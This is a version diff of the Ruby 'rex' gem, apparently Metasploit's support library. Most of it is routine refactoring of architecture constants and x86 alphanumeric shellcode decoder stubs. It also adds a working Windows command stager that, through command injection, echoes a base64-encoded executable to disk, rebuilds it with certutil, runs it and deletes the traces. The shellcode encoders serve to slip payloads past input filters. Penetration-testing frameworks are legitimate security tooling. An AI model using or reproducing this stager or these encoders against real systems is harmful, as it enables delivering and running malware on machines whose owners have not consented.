rex 2.0.8 → 2.0.9

checksums.yaml

@@ -1,7 +1,7 @@
 ---
 SHA1:
-  metadata.gz: 22c520a8b58476a0eec77db5441cfded29f8b2f3
-  data.tar.gz: 51e9bbbaf02d8bd0fb56dcf478afd3e309e149e8
+  metadata.gz: 5a35ae088f817815b2d3cd56ad4f298a1dc36a73
+  data.tar.gz: f486b6412dd555646eb747c4b65a4b01dd623f38
 SHA512:
-  metadata.gz: afa5bb9719866c18f8372147f7e50c6156453a8b5b882eadd083f5bfa6d7ca7bced4ca7a6c6381bb48ca90d71ff89fc579c1a12751f319ae9de25f3b8593803e
-  data.tar.gz: d0c9d1a506cad9ce76cd82770939d15d6652a03a8a4714284fa20f50e0b4ab534134e52ca0bd68f318b9b85763603342199d54ed169abe93a2913eb0d6c7b15b
+  metadata.gz: 96d9eed7f6fa713ae93f52a629113b9f5cdb41aed48db814731612bf2dbe74a0c657f83905640e188c1dcb622b3781125737e1faf1b06ab1eb29d15e99941acc
+  data.tar.gz: a7092a603aeab1a5291f522438f8a94a56e28a6f6134d1024c1b8fce85956e0432e818bf83fcee1710bdd2aeeb0c1bf2b297e7f40154f2a7544f20fb043d69f0

data/lib/rex.rb

@@ -42,6 +42,7 @@ end
 require 'rex/constants'
 require 'rex/exceptions'
 require 'rex/transformer'
+require 'rex/random_identifier_generator'
 require 'rex/text'
 require 'rex/time'
 require 'rex/job_container'

data/lib/rex/arch.rb

@@ -18,6 +18,7 @@ module Arch
   #
   require 'rex/arch/x86'
   require 'rex/arch/sparc'
+  require 'rex/arch/zarch'
 
   #
   # This routine adjusts the stack pointer for a given architecture.
@@ -64,6 +65,8 @@ module Arch
         [addr].pack('V')
       when ARCH_ARMBE
         [addr].pack('N')
+      when ARCH_ZARCH
+        [addr].pack('Q>')
     end
   end
 
@@ -95,6 +98,8 @@ module Arch
         return ENDIAN_LITTLE
       when ARCH_ARMBE
         return ENDIAN_BIG
+      when ARCH_ZARCH
+        return ENDIAN_BIG
     end
 
     return ENDIAN_LITTLE

data/lib/rex/arch/x86.rb

@@ -421,8 +421,7 @@ module X86
   # This method returns an array containing a geteip stub, a register, and an offset
   # This method will return nil if the getip generation fails
   #
-  def self.geteip_fpu(badchars)
-
+  def self.geteip_fpu(badchars, modified_registers = [])
     #
     # Default badchars to an empty string
     #
@@ -470,18 +469,29 @@ module X86
     #
     while(dsts.length > 0)
       buf = ''
+      mod_registers = [ESP]
       dst = dsts[ rand(dsts.length) ]
       dsts.delete(dst)
 
       # If the register is not ESP, copy ESP
       if (dst != ESP)
-        next if badchars.index( (0x70 + dst).chr )
+        mod_registers.push(dst)
+        if badchars.index( (0x70 + dst).chr )
+          mod_registers.pop(dst)
+          next
+        end
 
         if !(badchars.index("\x89") or badchars.index( (0xE0+dst).chr ))
           buf << "\x89" + (0xE0 + dst).chr
         else
-          next if badchars.index("\x54")
-          next if badchars.index( (0x58+dst).chr )
+          if badchars.index("\x54")
+            mod_registers.pop(dst)
+            next
+          end
+          if badchars.index( (0x58+dst).chr )
+            mod_registers.pop(dst)
+            next
+          end
           buf << "\x54" + (0x58 + dst).chr
         end
       end
@@ -506,6 +516,7 @@ module X86
         regs.delete(reg)
         next if reg == ESP
         next if badchars.index( (0x58 + reg).chr )
+        mod_registers.push(reg)
 
         # Pop the value back out
         0.upto(pad / 4) { |c| out << (0x58 + reg).chr }
@@ -513,8 +524,11 @@ module X86
         # Fix the value to point to self
         gap = out.length - buf.length
 
+        mod_registers.uniq!
+        modified_registers.concat(mod_registers)
         return [out, REG_NAMES32[reg].upcase, gap]
       end
+      mod_registers.pop(dst)
     end
 
     return nil

data/lib/rex/arch/zarch.rb

@@ -0,0 +1,17 @@
+# -*- coding: binary -*-
+
+module Rex
+module Arch
+
+#
+# base module for ZARCH creation    8/13/15
+# Author:   BeS Bigendian Smalls
+#
+
+module ZARCH
+
+
+end
+
+end end
+

data/lib/rex/compat.rb

@@ -166,9 +166,9 @@ def self.open_webrtc_browser(url='http://google.com/')
       app_data = ENV['APPDATA']
       paths << "#{app_data}\\Google\\Chrome\\Application\\chrome.exe"
 
-      paths.each do |p|
-        if File.exists?(p)
-          args = (p =~ /chrome\.exe/) ? "--allow-file-access-from-files" : ""
+      paths.each do |path|
+        if File.exists?(path)
+          args = (path =~ /chrome\.exe/) ? "--allow-file-access-from-files" : ""
           system("#{path} #{args} #{url}")
           found_browser = true
           break
@@ -188,13 +188,14 @@ def self.open_webrtc_browser(url='http://google.com/')
     end
   else
     if defined? ENV['PATH']
-      ['chrome', 'chromium', 'firefox', 'opera'].each do |browser|
+      ['firefox', 'google-chrome', 'chrome', 'chromium', 'firefox', 'opera'].each do |browser|
         ENV['PATH'].split(':').each do |path|
           browser_path = "#{path}/#{browser}"
           if File.exists?(browser_path)
             args = (browser_path =~ /Chrome/) ? "--allow-file-access-from-files" : ""
             system("#{browser_path} #{args} #{url} &")
             found_browser = true
+            break
           end
         end
       end

data/lib/rex/constants.rb

@@ -88,6 +88,7 @@ ARCH_DALVIK  = 'dalvik'
 ARCH_PYTHON  = 'python'
 ARCH_NODEJS  = 'nodejs'
 ARCH_FIREFOX = 'firefox'
+ARCH_ZARCH   = 'zarch'
 ARCH_TYPES   =
   [
     ARCH_X86,
@@ -110,7 +111,8 @@ ARCH_TYPES   =
     ARCH_DALVIK,
     ARCH_PYTHON,
     ARCH_NODEJS,
-    ARCH_FIREFOX
+    ARCH_FIREFOX,
+    ARCH_ZARCH,
   ]
 
 ARCH_ALL = ARCH_TYPES

data/lib/rex/encoder/alpha2/alpha_mixed.rb

@@ -8,22 +8,49 @@ module Alpha2
 
 class AlphaMixed < Generic
 
-  def self.gen_decoder_prefix(reg, offset)
-    if (offset > 32)
-      raise "Critical: Offset is greater than 32"
+  # Generates the decoder stub prefix
+  #
+  # @param [String] reg the register pointing to the encoded payload
+  # @param [Fixnum] offset the offset to reach the encoded payload
+  # @param [Array] modified_registers accounts the registers modified by the stub
+  # @return [String] the alpha mixed decoder stub prefix
+  def self.gen_decoder_prefix(reg, offset, modified_registers = [])
+    if offset > 32
+      raise 'Critical: Offset is greater than 32'
     end
 
+    mod_registers = []
+    nop_regs = []
+    mod_regs = []
+    edx_regs = []
+
     # use inc ebx as a nop here so we still pad correctly
-    if (offset <= 16)
+    if offset <= 16
       nop = 'C' * offset
+      nop_regs.push(Rex::Arch::X86::EBX) unless nop.empty?
+
       mod = 'I' * (16 - offset) + nop + '7QZ'    # dec ecx,,, push ecx, pop edx
+      mod_regs.push(Rex::Arch::X86::ECX) unless offset == 16
+      mod_regs.concat(nop_regs)
+      mod_regs.push(Rex::Arch::X86::EDX)
+
       edxmod = 'J' * (17 - offset)
+      edx_regs.push(Rex::Arch::X86::EDX) unless edxmod.empty?
     else
       mod = 'A' * (offset - 16)
+      mod_regs.push(Rex::Arch::X86::ECX) unless mod.empty?
+
       nop = 'C' * (16 - mod.length)
+      nop_regs.push(Rex::Arch::X86::EBX) unless nop.empty?
+
       mod << nop + '7QZ'
+      mod_regs.concat(nop_regs)
+      mod_regs.push(Rex::Arch::X86::EDX)
+
       edxmod = 'B' * (17 - (offset - 16))
+      edx_regs.push(Rex::Arch::X86::EDX) unless edxmod.empty?
     end
+
     regprefix = {
       'EAX'   => 'PY' + mod,                         # push eax, pop ecx
       'ECX'   => 'I' + mod,                          # dec ecx
@@ -36,15 +63,38 @@ class AlphaMixed < Generic
     }
 
     reg.upcase!
-    if (not regprefix.keys.include? reg)
-      raise ArgumentError.new("Invalid register name")
+
+    unless regprefix.keys.include?(reg)
+      raise ArgumentError.new('Invalid register name')
     end
+
+    case reg
+    when 'EDX'
+      mod_registers.concat(edx_regs)
+      mod_registers.concat(nop_regs)
+      mod_registers.push(Rex::Arch::X86::ECX)
+    else
+      mod_registers.push(Rex::Arch::X86::ECX)
+      mod_registers.concat(mod_regs)
+    end
+
+    mod_registers.uniq!
+    modified_registers.concat(mod_registers)
+
     return regprefix[reg]
   end
 
-  def self.gen_decoder(reg, offset)
+  # Generates the decoder stub
+  #
+  # @param [String] reg the register pointing to the encoded payload
+  # @param [Fixnum] offset the offset to reach the encoded payload
+  # @param [Array] modified_registers accounts the registers modified by the stub
+  # @return [String] the alpha mixed decoder stub
+  def self.gen_decoder(reg, offset, modified_registers = [])
+    mod_registers = []
+
     decoder =
-       gen_decoder_prefix(reg, offset) +
+       gen_decoder_prefix(reg, offset, mod_registers) +
        "jA" +          # push 0x41
        "X" +           # pop eax
        "P" +           # push eax
@@ -62,7 +112,18 @@ class AlphaMixed < Generic
        "uJ" +          # jnz short -------------------------
        "I"             # first encoded char, fixes the above J
 
-    return decoder
+    mod_registers.concat(
+      [
+        Rex::Arch::X86::ESP,
+        Rex::Arch::X86::EAX,
+        Rex::Arch::X86::ECX,
+        Rex::Arch::X86::EDX
+      ])
+
+    mod_registers.uniq!
+    modified_registers.concat(mod_registers)
+
+    decoder
   end
 
 end end end end

data/lib/rex/encoder/alpha2/alpha_upper.rb

@@ -9,21 +9,47 @@ module Alpha2
 class AlphaUpper < Generic
   def self.default_accepted_chars ; ('B' .. 'Z').to_a + ('0' .. '9').to_a ; end
 
-  def self.gen_decoder_prefix(reg, offset)
-    if (offset > 20)
-      raise "Critical: Offset is greater than 20"
+  # Generates the decoder stub prefix
+  #
+  # @param [String] reg the register pointing to the encoded payload
+  # @param [Fixnum] offset the offset to reach the encoded payload
+  # @param [Array] modified_registers accounts the registers modified by the stub
+  # @return [String] the alpha upper decoder stub prefix
+  def self.gen_decoder_prefix(reg, offset, modified_registers = [])
+    if offset > 20
+      raise 'Critical: Offset is greater than 20'
     end
 
+    mod_registers = []
+    nop_regs = []
+    mod_regs = []
+    edx_regs = []
+
     # use inc ebx as a nop here so we still pad correctly
     if (offset <= 10)
       nop = 'C' * offset
+      nop_regs.push(Rex::Arch::X86::EBX) unless nop.empty?
+
       mod = 'I' * (10 - offset) + nop + 'QZ'    # dec ecx,,, push ecx, pop edx
+      mod_regs.push(Rex::Arch::X86::ECX) unless offset == 10
+      mod_regs.concat(nop_regs)
+      mod_regs.push(Rex::Arch::X86::EDX)
+
       edxmod = 'J' * (11 - offset)
+      edx_regs.push(Rex::Arch::X86::EDX) unless edxmod.empty?
     else
       mod = 'A' * (offset - 10)
+      mod_regs.push(Rex::Arch::X86::ECX) unless mod.empty?
+
       nop = 'C' * (10 - mod.length)
+      nop_regs.push(Rex::Arch::X86::EBX) unless nop.empty?
+
       mod << nop + 'QZ'
+      mod_regs.concat(nop_regs)
+      mod_regs.push(Rex::Arch::X86::EDX)
+
       edxmod = 'B' * (11 - (offset - 10))
+      edx_regs.push(Rex::Arch::X86::EDX) unless edxmod.empty?
     end
     regprefix = {
       'EAX'   => 'PY' + mod,                        # push eax, pop ecx
@@ -33,20 +59,41 @@ class AlphaUpper < Generic
       'ESP'   => 'TY' + mod,                        # push esp, pop ecx
       'EBP'   => 'UY' + mod,                        # push ebp, pop ecx
       'ESI'   => 'VY' + mod,                        # push esi, pop ecx
-      'EDI'   => 'WY' + mod,                        # push edi, pop edi
+      'EDI'   => 'WY' + mod,                        # push edi, pop ecx
     }
 
     reg.upcase!
-    if (not regprefix.keys.include? reg)
+    unless regprefix.keys.include?(reg)
       raise ArgumentError.new("Invalid register name")
     end
-    return regprefix[reg]
 
+    case reg
+    when 'EDX'
+      mod_registers.concat(edx_regs)
+      mod_registers.concat(nop_regs)
+      mod_registers.push(Rex::Arch::X86::ECX)
+    else
+      mod_registers.push(Rex::Arch::X86::ECX)
+      mod_registers.concat(mod_regs)
+    end
+
+    mod_registers.uniq!
+    modified_registers.concat(mod_registers)
+
+    return regprefix[reg]
   end
 
-  def self.gen_decoder(reg, offset)
+  # Generates the decoder stub
+  #
+  # @param [String] reg the register pointing to the encoded payload
+  # @param [Fixnum] offset the offset to reach the encoded payload
+  # @param [Array] modified_registers accounts the registers modified by the stub
+  # @return [String] the alpha upper decoder stub
+  def self.gen_decoder(reg, offset, modified_registers = [])
+    mod_registers = []
+
     decoder =
-      gen_decoder_prefix(reg, offset) +
+      gen_decoder_prefix(reg, offset, mod_registers) +
       "V" +           # push esi
       "T" +           # push esp
       "X" +           # pop eax
@@ -73,6 +120,18 @@ class AlphaUpper < Generic
       "JJ" +          # jnz * --------------------
       "I"             # first encoded char, fixes the above J
 
+    mod_registers.concat(
+      [
+        Rex::Arch::X86::ESP,
+        Rex::Arch::X86::EAX,
+        Rex::Arch::X86::ESI,
+        Rex::Arch::X86::ECX,
+        Rex::Arch::X86::EDX
+      ])
+
+    mod_registers.uniq!
+    modified_registers.concat(mod_registers)
+
     return decoder
   end
 

data/lib/rex/exploitation/cmdstager.rb

@@ -2,6 +2,7 @@
 
 require 'rex/exploitation/cmdstager/base'
 require 'rex/exploitation/cmdstager/vbs'
+require 'rex/exploitation/cmdstager/certutil'
 require 'rex/exploitation/cmdstager/debug_write'
 require 'rex/exploitation/cmdstager/debug_asm'
 require 'rex/exploitation/cmdstager/tftp'

data/lib/rex/exploitation/cmdstager/certutil.rb

@@ -0,0 +1,115 @@
+# -*- coding: binary -*-
+
+require 'rex/text'
+require 'rex/arch'
+require 'msf/core/framework'
+
+module Rex
+module Exploitation
+
+###
+#
+# This class provides the ability to create a sequence of commands from an executable.
+# When this sequence is ran via command injection or a shell, the resulting exe will
+# be written to disk and executed.
+#
+# This particular version uses Windows certutil to base64 decode a file,
+# created via echo >>, and decode it to the final binary.
+#
+#
+# Written by xistence
+# Original discovery by @mattifestation - https://gist.github.com/mattifestation/47f9e8a431f96a266522
+#
+###
+
+class CmdStagerCertutil < CmdStagerBase
+
+  def initialize(exe)
+    super
+
+    @var_encoded = Rex::Text.rand_text_alpha(5)
+    @var_decoded = Rex::Text.rand_text_alpha(5)
+    @decoder     = nil # filled in later
+  end
+
+
+  # Override just to set the extra byte count
+  # @param opts [Array] The options to generate the command line
+  # @return [Array] The complete command line
+  def generate_cmds(opts)
+    # Set the start/end of the commands here (vs initialize) so we have @tempdir
+    @cmd_start = "echo "
+    @cmd_end   = ">>#{@tempdir}#{@var_encoded}.b64"
+    xtra_len = @cmd_start.length + @cmd_end.length + 1
+    opts.merge!({ :extra => xtra_len })
+    super
+  end
+
+
+  # Simple base64 encoder for the executable
+  # @param opts [Array] The options to generate the command line
+  # @return [String] Base64 encoded executable
+  def encode_payload(opts)
+    Rex::Text.encode_base64(@exe)
+  end
+
+
+  # Combine the parts of the encoded file with the stuff that goes
+  # before / after it.
+  # @param parts [Array] Splitted commands
+  # @param opts [Array] The options to generate the command line
+  # @return [Array] The command line
+  def parts_to_commands(parts, opts)
+
+    cmds = []
+    parts.each do |p|
+      cmd = ''
+      cmd << @cmd_start
+      cmd << p
+      cmd << @cmd_end
+      cmds << cmd
+    end
+
+    cmds
+  end
+
+
+  # Generate the commands that will decode the file we just created
+  # @param opts [Array] The options to generate the command line
+  # @return [Array] The certutil Base64 decoder part of the command line
+  def generate_cmds_decoder(opts)
+
+    cmds = []
+    cmds << "certutil -decode #{@tempdir}#{@var_encoded}.b64 #{@tempdir}#{@var_decoded}.exe"
+    return cmds
+  end
+
+
+  # We override compress commands just to stick in a few extra commands
+  # last second..
+  # @param cmds [Array] Complete command line
+  # @param opts [Array] Extra options for command line generation
+  # @return [Array] The complete command line including cleanup
+  def compress_commands(cmds, opts)
+    # Make it all happen
+    cmds << "#{@tempdir}#{@var_decoded}.exe"
+
+    # Clean up after unless requested not to..
+    if (not opts[:nodelete])
+      cmds << "del #{@tempdir}#{@var_encoded}.b64"
+      # NOTE: We won't be able to delete the exe while it's in use.
+    end
+
+    super
+  end
+
+  # Windows uses & to concat strings
+  #
+  # @return [String] Concat operator
+  def cmd_concat_operator
+    " & "
+  end
+
+end
+end
+end